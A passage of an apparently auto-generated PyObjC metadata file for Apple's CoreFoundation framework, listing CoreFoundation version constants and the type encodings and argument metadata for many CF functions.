CFXMLParserReplacePhysicalEntities@4$kCFXMLParserResolveExternalEntities@16$kCFXMLParserSkipMetaData@2$kCFXMLParserSkipWhitespace@8$kCFXMLParserValidateDocument@1$kCFXMLStatusParseInProgress@-1$kCFXMLStatusParseNotBegun@-2$kCFXMLStatusParseSuccessful@0$"""
misc.update(
{
"kCFCoreFoundationVersionNumber10_7_1": 635.0,
"kCFCoreFoundationVersionNumber10_4_4_Intel": 368.26,
"kCFCoreFoundationVersionNumber10_11_4": 1258.1,
"kCFCoreFoundationVersionNumber10_11_3": 1256.14,
"kCFCoreFoundationVersionNumber10_11_2": 1256.14,
"kCFCoreFoundationVersionNumber10_11_1": 1255.1,
"kCFCoreFoundationVersionNumber10_10_4": 1153.18,
"kCFCoreFoundationVersionNumber10_10_5": 1153.18,
"kCFCoreFoundationVersionNumber10_10_3": 1153.18,
"kCFCoreFoundationVersionNumber10_10_1": 1151.16,
"kCFCoreFoundationVersionNumber10_8_2": 744.12,
"kCFCoreFoundationVersionNumber10_8_3": 744.18,
"kCFCoreFoundationVersionNumber10_8_1": 744.0,
"kCFCoreFoundationVersionNumber10_5_1": 476.0,
"kCFCoreFoundationVersionNumber10_8_4": 744.19,
"kCFCoreFoundationVersionNumber10_9_2": 855.14,
"kCFCoreFoundationVersionNumber10_9_1": 855.11,
"kCFCoreFoundationVersionNumber10_4_7": 368.27,
"kCFCoreFoundationVersionNumber10_4_4_PowerPC": 368.25,
"kCFCoreFoundationVersionNumber10_4_2": 368.11,
"kCFCoreFoundationVersionNumber10_4_3": 368.18,
"kCFCoreFoundationVersionNumber10_4_1": 368.1,
"kCFCoreFoundationVersionNumber10_5_7": 476.18,
"kCFCoreFoundationVersionNumber10_5_6": 476.17,
"kCFCoreFoundationVersionNumber10_5_5": 476.15,
"kCFCoreFoundationVersionNumber10_5_4": 476.14,
"kCFCoreFoundationVersionNumber10_5_3": 476.13,
"kCFCoreFoundationVersionNumber10_5_2": 476.1,
"kCFCoreFoundationVersionNumber10_4_8": 368.27,
"kCFCoreFoundationVersionNumber10_4_9": 368.28,
"kCFCoreFoundationVersionNumber10_2_4": 263.3,
"kCFCoreFoundationVersionNumber10_2_5": 263.5,
"kCFCoreFoundationVersionNumber10_2_6": 263.5,
"kCFCoreFoundationVersionNumber10_2_7": 263.5,
"kCFCoreFoundationVersionNumber10_3_9": 299.35,
"kCFCoreFoundationVersionNumber10_2_1": 263.1,
"kCFCoreFoundationVersionNumber10_2_2": 263.1,
"kCFCoreFoundationVersionNumber10_2_3": 263.3,
"kCFCoreFoundationVersionNumber10_3_5": 299.31,
"kCFCoreFoundationVersionNumber10_3_4": 299.31,
"kCFCoreFoundationVersionNumber10_3_7": 299.33,
"kCFCoreFoundationVersionNumber10_3_6": 299.32,
"kCFCoreFoundationVersionNumber10_3_1": 299.0,
"kCFCoreFoundationVersionNumber10_3_3": 299.3,
"kCFCoreFoundationVersionNumber10_3_2": 299.0,
"kCFCoreFoundationVersionNumber10_1_3": 227.2,
"kCFCoreFoundationVersionNumber10_1_2": 227.2,
"kCFCoreFoundationVersionNumber10_1_1": 226.0,
"kCFCoreFoundationVersionNumber10_1_4": 227.3,
"kCFCoreFoundationVersionNumber10_4_6_PowerPC": 368.25,
"kCFCoreFoundationVersionNumber10_6_2": 550.13,
"kCFCoreFoundationVersionNumber10_6_3": 550.19,
"kCFCoreFoundationVersionNumber10_6_4": 550.29,
"kCFCoreFoundationVersionNumber10_6_5": 550.42,
"kCFCoreFoundationVersionNumber10_6_6": 550.42,
"kCFCoreFoundationVersionNumber10_6_7": 550.42,
"kCFCoreFoundationVersionNumber10_6_8": 550.43,
"kCFCoreFoundationVersionNumber10_0_3": 196.5,
"kCFCoreFoundationVersionNumber10_7_3": 635.19,
"kCFCoreFoundationVersionNumber10_7_2": 635.15,
"kCFCoreFoundationVersionNumber10_4_10": 368.28,
"kCFCoreFoundationVersionNumber10_7_4": 635.21,
"kCFCoreFoundationVersionNumber10_4_5_PowerPC": 368.25,
"kCFCoreFoundationVersionNumber10_3_8": 299.33,
"kCFCoreFoundationVersionNumber10_10": 1151.16,
"kCFCoreFoundationVersionNumber10_4_5_Intel": 368.26,
"kCFCoreFoundationVersionNumber10_2_8": 263.5,
"kCFCoreFoundationVersionNumber10_5_8": 476.19,
"kCFCoreFoundationVersionNumber10_4_11": 368.31,
"kCFCoreFoundationVersionNumber10_6_1": 550.0,
"kCFCoreFoundationVersionNumber10_8": 744.0,
"kCFCoreFoundationVersionNumber10_5": 476.0,
"kCFCoreFoundationVersionNumber10_4": 368.0,
"kCFCoreFoundationVersionNumber10_7": 635.0,
"kCFCoreFoundationVersionNumber10_6": 550.0,
"kCFCoreFoundationVersionNumber10_1": 226.0,
"kCFCoreFoundationVersionNumber10_0": 196.4,
"kCFCoreFoundationVersionNumber10_3": 299.0,
"kCFCoreFoundationVersionNumber10_2": 263.0,
"kCFCoreFoundationVersionNumber10_7_5": 635.21,
"kCFCoreFoundationVersionNumber10_9": 855.11,
"kCFCoreFoundationVersionNumber10_4_6_Intel": 368.26,
}
)
functions = {
"CFURLCreateByResolvingBookmarkData": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^{__CFData=}L^{__CFURL=}^{__CFArray=}^Z^^{__CFError=}",
b"^{__CFURL=}^{__CFAllocator=}^{__CFData=}Q^{__CFURL=}^{__CFArray=}^Z^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {"type_modifier": "o"},
6: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFConvertDoubleSwappedToHost": (b"d{_CFSwappedFloat64=Q}",),
"CFURLCreateCopyAppendingPathComponent": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^{__CFString=}Z",
"",
{"retval": {"already_cfretained": True}},
),
"CFRangeMake": (sel32or64(b"{_CFRange=ll}ll", b"{_CFRange=qq}qq"),),
"CFBitVectorGetCount": (sel32or64(b"l^{__CFBitVector=}", b"q^{__CFBitVector=}"),),
"CFDictionaryContainsKey": (b"Z^{__CFDictionary=}@",),
"CFPreferencesCopyValue": (
b"@^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFGetAllocator": (b"^{__CFAllocator=}@",),
"CFSetCreateMutable": (
sel32or64(
b"^{__CFSet=}^{__CFAllocator=}l^{_CFSetCallBacks=l^?^?^?^?^?}",
b"^{__CFSet=}^{__CFAllocator=}q^{_CFSetCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorGetCode": (sel32or64(b"l^{__CFError=}", b"q^{__CFError=}"),),
"CFStringGetFileSystemRepresentation": (
sel32or64(b"Z^{__CFString=}^tl", b"Z^{__CFString=}^tq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "o"}}},
),
"CFLocaleGetTypeID": (sel32or64(b"L", b"Q"),),
"CFUUIDGetUUIDBytes": (b"{_CFUUIDBytes=CCCCCCCCCCCCCCCC}^{__CFUUID=}",),
"CFDateFormatterCreateDateFormatFromTemplate": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}L^{__CFLocale=}",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}Q^{__CFLocale=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeInsertSibling": (b"v^{__CFTree=}^{__CFTree=}",),
"CFSocketConnectToAddress": (
sel32or64(b"l^{__CFSocket=}^{__CFData=}d", b"q^{__CFSocket=}^{__CFData=}d"),
),
"CFWriteStreamScheduleWithRunLoop": (
b"v^{__CFWriteStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFDateFormatterCreateStringWithAbsoluteTime": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDateFormatter=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFReadStreamScheduleWithRunLoop": (
b"v^{__CFReadStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFArrayAppendValue": (b"v^{__CFArray=}@",),
"CFSetRemoveValue": (b"v^{__CFSet=}@",),
"CFBundleCopyPrivateFrameworksURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorCreateMutable": (
sel32or64(
b"^{__CFBitVector=}^{__CFAllocator=}l",
b"^{__CFBitVector=}^{__CFAllocator=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCreateCanonicalLocaleIdentifierFromString": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringTokenizerCopyBestStringLanguage": (
sel32or64(
b"^{__CFString=}^{__CFString=}{_CFRange=ll}",
b"^{__CFString=}^{__CFString=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDCreate": (
b"^{__CFUUID=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetRangeOfUnit": (
sel32or64(
b"{_CFRange=ll}^{__CFCalendar=}LLd", b"{_CFRange=qq}^{__CFCalendar=}QQd"
),
),
"CFStringFindWithOptionsAndLocale": (
sel32or64(
b"Z^{__CFString=}^{__CFString=}{_CFRange=ll}L^{__CFLocale=}^{_CFRange=ll}",
b"Z^{__CFString=}^{__CFString=}{_CFRange=qq}Q^{__CFLocale=}^{_CFRange=qq}",
),
"",
{"arguments": {5: {"type_modifier": "o"}}},
),
"CFURLSetResourcePropertyForKey": (
b"Z^{__CFURL=}^{__CFString=}@^^{__CFError=}",
"",
{
"arguments": {
3: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFFileSecurityCopyOwnerUUID": (
b"Z^{__CFFileSecurity=}^^{__CFUUID=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}},
},
),
"CFCalendarAddComponents": (
sel32or64(b"Z^{__CFCalendar=}^dL^c", b"Z^{__CFCalendar=}^dQ^c"),
"",
{"variadic": True},
),
"CFLocaleCopyCommonISOCurrencyCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetOrdinalityOfUnit": (
sel32or64(b"l^{__CFCalendar=}LLd", b"q^{__CFCalendar=}QQd"),
),
"CFPreferencesRemoveSuitePreferencesFromApp": (b"v^{__CFString=}^{__CFString=}",),
"CFCalendarGetMinimumDaysInFirstWeek": (
sel32or64(b"l^{__CFCalendar=}", b"q^{__CFCalendar=}"),
),
"CFURLCreateWithFileSystemPathRelativeToBase": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}lZ^{__CFURL=}",
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}qZ^{__CFURL=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBinaryHeapGetCountOfValue": (
sel32or64(b"l^{__CFBinaryHeap=}@", b"q^{__CFBinaryHeap=}@"),
),
"CFStringIsSurrogateLowCharacter": (b"ZT",),
"CFStringTrim": (b"v^{__CFString=}^{__CFString=}",),
"CFXMLNodeGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringSetExternalCharactersNoCopy": (
sel32or64(b"v^{__CFString=}^Tll", b"v^{__CFString=}^Tqq"),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 3, "type_modifier": "n"}},
},
),
"CFLocaleGetSystem": (b"^{__CFLocale=}",),
"CFDataGetLength": (sel32or64(b"l^{__CFData=}", b"q^{__CFData=}"),),
"CFWriteStreamWrite": (
sel32or64(b"l^{__CFWriteStream=}^vl", b"q^{__CFWriteStream=}^vq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}}},
),
"CFBundleGetVersionNumber": (sel32or64(b"L^{__CFBundle=}", b"I^{__CFBundle=}"),),
"CFGetRetainCount": (sel32or64(b"l@", b"q@"),),
"CFRunLoopObserverGetContext": (
sel32or64(
b"v^{__CFRunLoopObserver=}^{_CFRunLoopObserverContext=l^v^?^?^?}",
b"v^{__CFRunLoopObserver=}^{_CFRunLoopObserverContext=q^v^?^?^?}",
),
),
"CFDataCreateWithBytesNoCopy": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^vl^{__CFAllocator=}",
b"^{__CFData=}^{__CFAllocator=}^vq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFURLEnumeratorGetNextURL": (
sel32or64(
b"l^{__CFURLEnumerator=}^^{__CFURL=}^^{__CFError=}",
b"q^{__CFURLEnumerator=}^^{__CFURL=}^^{__CFError=}",
),
"",
{
"arguments": {
1: {"type_modifier": "o"},
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
}
},
),
"CFRunLoopTimerGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringConvertNSStringEncodingToEncoding": (sel32or64(b"LL", b"IQ"),),
"CFURLCreateBookmarkDataFromFile": (
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFBundleCopyResourceURLForLocalization": (
b"^{__CFURL=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetMaximumSizeForEncoding": (sel32or64(b"llL", b"qqI"),),
"CFStringTransform": (
sel32or64(
b"Z^{__CFString=}^{_CFRange=ll}^{__CFString=}Z",
b"Z^{__CFString=}^{_CFRange=qq}^{__CFString=}Z",
),
"",
{"arguments": {1: {"type_modifier": "N"}}},
),
"CFURLStopAccessingSecurityScopedResource": (b"v^{__CFURL=}",),
"CFDataCreateMutableCopy": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}l^{__CFData=}",
b"^{__CFData=}^{__CFAllocator=}q^{__CFData=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortGetContext": (
sel32or64(
b"v^{__CFMachPort=}^{_CFMachPortContext=l^v^?^?^?}",
b"v^{__CFMachPort=}^{_CFMachPortContext=q^v^?^?^?}",
),
),
"CFDateFormatterGetDateStyle": (
sel32or64(b"l^{__CFDateFormatter=}", b"q^{__CFDateFormatter=}"),
),
"CFStringGetHyphenationLocationBeforeIndex": (
sel32or64(
b"l^{__CFString=}l{_CFRange=ll}L^{__CFLocale=}^L",
b"q^{__CFString=}q{_CFRange=qq}Q^{__CFLocale=}^I",
),
"",
{"arguments": {5: {"type_modifier": "o"}}},
),
"CFRunLoopIsWaiting": (b"Z^{__CFRunLoop=}",),
"CFAttributedStringReplaceString": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFString=}",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFString=}",
),
),
"CFSocketCreateWithNative": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}iL^?^{_CFSocketContext=l^v^?^?^?}",
b"^{__CFSocket=}^{__CFAllocator=}iQ^?^{_CFSocketContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFMessagePortCreateLocal": (
sel32or64(
b"^{__CFMessagePort=}^{__CFAllocator=}^{__CFString=}^?^{_CFMessagePortContext=l^v^?^?^?}^Z",
b"^{__CFMessagePort=}^{__CFAllocator=}^{__CFString=}^?^{_CFMessagePortContext=q^v^?^?^?}^Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"callable": {
"retval": {"type": b"^{__CFData=}"},
"arguments": {
0: {"type": b"^{__CFMessagePort=}"},
1: {"type": b"i"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
},
}
}
},
},
),
"CFTimeZoneCopyDefault": (
b"^{__CFTimeZone=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetValueAtIndex": (sel32or64(b"@^{__CFArray=}l", b"@^{__CFArray=}q"),),
"CFErrorCopyFailureReason": (
b"^{__CFString=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBinaryHeapContainsValue": (b"Z^{__CFBinaryHeap=}@",),
"CFNumberFormatterGetStyle": (
sel32or64(b"l^{__CFNumberFormatter=}", b"q^{__CFNumberFormatter=}"),
),
"CFXMLParserCreate": (
sel32or64(
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Ll^{_CFXMLParserCallBacks=l^?^?^?^?^?}^{_CFXMLParserContext=l^v^?^?^?}",
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Qq^{_CFXMLParserCallBacks=q^?^?^?^?^?}^{_CFXMLParserContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCopyPreferredLanguages": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBagCreateCopy": (
b"^{__CFBag=}^{__CFAllocator=}^{__CFBag=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNotificationCenterGetDistributedCenter": (b"^{__CFNotificationCenter=}",),
"CFXMLTreeGetNode": (b"^{__CFXMLNode=}^{__CFTree=}",),
"CFDateCreate": (
b"^{__CFDate=}^{__CFAllocator=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorCopyDescription": (
b"^{__CFString=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetGetTypeID": (sel32or64(b"L", b"Q"),),
"CFWriteStreamCopyProperty": (
b"@^{__CFWriteStream=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetLength": (
sel32or64(b"l^{__CFAttributedString=}", b"q^{__CFAttributedString=}"),
),
"CFStringGetCStringPtr": (
sel32or64(b"^t@L", b"^t@I"),
"",
{"retval": {"c_array_delimited_by_null": True}},
),
"CFFileDescriptorEnableCallBacks": (
sel32or64(b"v^{__CFFileDescriptor=}L", b"v^{__CFFileDescriptor=}Q"),
),
"CFURLGetString": (b"^{__CFString=}^{__CFURL=}",),
"CFReadStreamSetProperty": (b"Z^{__CFReadStream=}^{__CFString=}@",),
"CFFileDescriptorInvalidate": (b"v^{__CFFileDescriptor=}",),
"CFBagGetCountOfValue": (sel32or64(b"l^{__CFBag=}@", b"q^{__CFBag=}@"),),
"CFAbsoluteTimeGetCurrent": (b"d",),
"CFLocaleCopyISOCurrencyCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopySharedFrameworksURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringCreateWithSubstring": (
sel32or64(
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFAttributedString=}{_CFRange=ll}",
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFAttributedString=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringAppend": (b"v^{__CFString=}^{__CFString=}",),
"CFRelease": (b"v@",),
"CFAllocatorGetDefault": (b"^{__CFAllocator=}",),
"CFStringTokenizerAdvanceToNextToken": (
sel32or64(b"L^{__CFStringTokenizer=}", b"Q^{__CFStringTokenizer=}"),
),
"CFAttributedStringGetAttributeAndLongestEffectiveRange": (
sel32or64(
b"@^{__CFAttributedString=}l^{__CFString=}{_CFRange=ll}^{_CFRange=ll}",
b"@^{__CFAttributedString=}q^{__CFString=}{_CFRange=qq}^{_CFRange=qq}",
),
"",
{"arguments": {4: {"type_modifier": "o"}}},
),
"CFFileDescriptorGetContext": (
sel32or64(
b"v^{__CFFileDescriptor=}^{_CFFileDescriptorContext=l^v^?^?^?}",
b"v^{__CFFileDescriptor=}^{_CFFileDescriptorContext=q^v^?^?^?}",
),
),
"CFUserNotificationPopUpSelection": (sel32or64(b"Ll", b"Qq"),),
"CFStringConvertIANACharSetNameToEncoding": (
sel32or64(b"L^{__CFString=}", b"I^{__CFString=}"),
),
"CFDateFormatterGetTimeStyle": (
sel32or64(b"l^{__CFDateFormatter=}", b"q^{__CFDateFormatter=}"),
),
"CFSocketSetSocketFlags": (sel32or64(b"v^{__CFSocket=}L", b"v^{__CFSocket=}Q"),),
"CFXMLCreateStringByUnescapingEntities": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateWithSubstring": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}{_CFRange=ll}",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamSetDispatchQueue": (
sel32or64(
b"v^{__CFWriteStream=}^{dispatch_queue_s=}", b"v^{__CFWriteStream=}@"
),
),
"CFStringCreateMutableCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}l^{__CFString=}",
b"^{__CFString=}^{__CFAllocator=}q^{__CFString=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyExecutableArchitectures": (
b"^{__CFArray=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryCreateCopy": (
b"^{__CFDictionary=}^{__CFAllocator=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopPerformBlock": (
b"v^{__CFRunLoop=}@@?",
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"^v"}},
},
"block": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"v"}},
},
}
}
},
),
"CFStringPad": (
sel32or64(
b"v^{__CFString=}^{__CFString=}ll", b"v^{__CFString=}^{__CFString=}qq"
),
),
"CFLocaleGetValue": (b"@^{__CFLocale=}^{__CFString=}",),
"CFLocaleCopyISOLanguageCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSocketSendData": (
sel32or64(
b"l^{__CFSocket=}^{__CFData=}^{__CFData=}d",
b"q^{__CFSocket=}^{__CFData=}^{__CFData=}d",
),
),
"CFDataIncreaseLength": (sel32or64(b"v^{__CFData=}l", b"v^{__CFData=}q"),),
"CFBagGetValueIfPresent": (
b"Z^{__CFBag=}@^@",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFBooleanGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyAuxiliaryExecutableURL": (
b"^{__CFURL=}^{__CFBundle=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLEnumeratorCreateForMountedVolumes": (
sel32or64(
b"^{__CFURLEnumerator=}^{__CFAllocator=}L^{__CFArray=}",
b"^{__CFURLEnumerator=}^{__CFAllocator=}Q^{__CFArray=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFFileSecurityGetMode": (
b"Z^{__CFFileSecurity=}^S",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFReadStreamSetClient": (
sel32or64(
b"Z^{__CFReadStream=}L^?^{_CFStreamClientContext=l^v^?^?^?}",
b"Z^{__CFReadStream=}Q^?^{_CFStreamClientContext=q^v^?^?^?}",
),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFReadStream=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
}
},
),
"CFStringConvertEncodingToWindowsCodepage": (sel32or64(b"LL", b"II"),),
"CFMachPortGetInvalidationCallBack": (b"^?^{__CFMachPort=}",),
"CFURLCopyFileSystemPath": (
sel32or64(b"^{__CFString=}^{__CFURL=}l", b"^{__CFString=}^{__CFURL=}q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopSourceSignal": (b"v^{__CFRunLoopSource=}",),
"CFBundleCopyInfoDictionaryInDirectory": (
b"^{__CFDictionary=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFUserNotificationDisplayAlert": (
sel32or64(
b"ldL^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^L",
b"idQ^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^Q",
),
"",
{"arguments": {10: {"type_modifier": "o"}}},
),
"CFURLClearResourcePropertyCacheForKey": (b"v^{__CFURL=}^{__CFString=}",),
"CFBinaryHeapGetMinimum": (b"@^{__CFBinaryHeap=}",),
"CFNotificationCenterAddObserver": (
sel32or64(
b"v^{__CFNotificationCenter=}@^?@@l", b"v^{__CFNotificationCenter=}@^?@@q"
),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
3: {"type": b"@"},
4: {"type": b"@"},
},
}
}
}
},
),
"CFCalendarCopyTimeZone": (
b"^{__CFTimeZone=}^{__CFCalendar=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetTypeID": (sel32or64(b"L", b"Q"),),
"CFPropertyListWriteToStream": (
sel32or64(
b"l@^{__CFWriteStream=}l^^{__CFString=}",
b"q@^{__CFWriteStream=}q^^{__CFString=}",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFBagAddValue": (b"v^{__CFBag=}@",),
"CFCharacterSetCreateMutable": (
b"^{__CFCharacterSet=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeGetParent": (b"^{__CFTree=}^{__CFTree=}",),
"CFCalendarGetComponentDifference": (
sel32or64(b"Z^{__CFCalendar=}ddL^c", b"Z^{__CFCalendar=}ddQ^c"),
"",
{"variadic": True},
),
"CFURLGetByteRangeForComponent": (
sel32or64(
b"{_CFRange=ll}^{__CFURL=}l^{_CFRange=ll}",
b"{_CFRange=qq}^{__CFURL=}q^{_CFRange=qq}",
),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFRunLoopRunInMode": (sel32or64(b"l^{__CFString=}dZ", b"i^{__CFString=}dZ"),),
"CFBundleCopyExecutableURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringReplace": (
sel32or64(
b"v^{__CFString=}{_CFRange=ll}^{__CFString=}",
b"v^{__CFString=}{_CFRange=qq}^{__CFString=}",
),
),
"CFSocketGetNative": (b"i^{__CFSocket=}",),
"CFConvertFloatSwappedToHost": (b"f{_CFSwappedFloat32=I}",),
"CFBundleOpenBundleResourceMap": (
sel32or64(b"s^{__CFBundle=}", b"i^{__CFBundle=}"),
),
"CFDataFind": (
sel32or64(
b"{_CFRange=ll}^{__CFData=}^{__CFData=}{_CFRange=ll}L",
b"{_CFRange=qq}^{__CFData=}^{__CFData=}{_CFRange=qq}Q",
),
),
"CFMachPortCreate": (
sel32or64(
b"^{__CFMachPort=}^{__CFAllocator=}^?^{_CFMachPortContext=l^v^?^?^?}^Z",
b"^{__CFMachPort=}^{__CFAllocator=}^?^{_CFMachPortContext=q^v^?^?^?}^Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMachPort=}"},
1: {"type": b"^v"},
2: {"type": b"q"},
3: {"type": b"^v"},
},
}
}
},
},
),
"CFAttributedStringReplaceAttributedString": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFAttributedString=}",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFAttributedString=}",
),
),
"CFTimeZoneCreateWithName": (
b"^{__CFTimeZone=}^{__CFAllocator=}^{__CFString=}Z",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleGetPackageInfoInDirectory": (
sel32or64(b"Z^{__CFURL=}^L^L", b"Z^{__CFURL=}^I^I"),
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFURLCreateData": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}LZ",
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}IZ",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberFormatterCreateStringWithNumber": (
b"^{__CFString=}^{__CFAllocator=}^{__CFNumberFormatter=}^{__CFNumber=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetMaximumRangeOfUnit": (
sel32or64(b"{_CFRange=ll}^{__CFCalendar=}L", b"{_CFRange=qq}^{__CFCalendar=}Q"),
),
"CFRunLoopRemoveSource": (b"v^{__CFRunLoop=}^{__CFRunLoopSource=}^{__CFString=}",),
"CFSwapInt32": (b"II",),
"CFXMLParserCreateWithDataFromURL": (
sel32or64(
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFURL=}Ll^{_CFXMLParserCallBacks=l^?^?^?^?^?}^{_CFXMLParserContext=l^v^?^?^?}",
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFURL=}Qq^{_CFXMLParserCallBacks=q^?^?^?^?^?}^{_CFXMLParserContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopTimerGetNextFireDate": (b"d^{__CFRunLoopTimer=}",),
"CFBitVectorGetCountOfBit": (
sel32or64(
b"l^{__CFBitVector=}{_CFRange=ll}L", b"q^{__CFBitVector=}{_CFRange=qq}I"
),
